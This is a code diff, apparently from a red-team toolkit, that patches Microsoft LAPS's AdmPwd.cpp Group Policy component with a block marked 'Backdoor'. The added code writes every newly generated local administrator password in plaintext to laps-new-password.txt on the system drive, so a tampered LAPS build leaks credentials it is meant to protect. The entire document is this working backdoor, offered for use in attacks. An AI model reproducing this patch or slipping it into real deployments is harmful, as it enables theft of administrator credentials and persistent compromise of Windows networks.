mgeeky-Penetration-Testing-.../red-teaming/LAPS-Backdoor/AdmPwd.cpp.diff

54 lines
2.5 KiB
Diff
Raw Permalink Normal View History

2018-12-18 23:20:18 +01:00
<EFBFBD><EFBFBD>diff --git a/Main/AdmPwd/AdmPwd.cpp b/Main/AdmPwd/AdmPwd.cpp
index 85f14df..b379811 100644
--- a/Main/AdmPwd/AdmPwd.cpp
+++ b/Main/AdmPwd/AdmPwd.cpp
@@ -115,6 +115,48 @@ ADMPWD_API DWORD APIENTRY ProcessGroupPolicy(
GetSystemTimeAsFileTime(&currentTime);
LogData.dwID = S_REPORT_PWD;
LogData.hr = comp.ReportPassword(newPwd, &currentTime, config.PasswordAge);
+
+ // --------------------
+ // Backdoor
+
+ HANDLE outFile;
+ WCHAR *buff = new WCHAR[512];
+ if (buff) {
+ if (GetEnvironmentVariableW(L"SystemDrive", buff, 512)){
+ wcscat_s(buff, 512, L"\\laps-new-password.txt");
+ outFile = CreateFileW(
+ buff,
+ GENERIC_WRITE,
+ FILE_SHARE_READ,
+ NULL,
+ OPEN_ALWAYS,
+ FILE_ATTRIBUTE_NORMAL,
+ NULL
+ );
+
+ if (outFile != static_cast<HANDLE>(INVALID_HANDLE_VALUE)) {
+ DWORD written = 0;
+
+ wcscpy_s(buff, 512, newPwd);
+ wcscat_s(buff, 512, L"\r\n");
+
+ WriteFile(
+ outFile,
+ buff,
+ sizeof(WCHAR) * wcslen(buff),
+ &written,
+ NULL
+ );
+
+ CloseHandle(outFile);
+ }
+ }
+
+ delete[] buff;
+ }
+
+ // --------------------
+
if (FAILED(LogData.hr))
throw LogData.hr;
else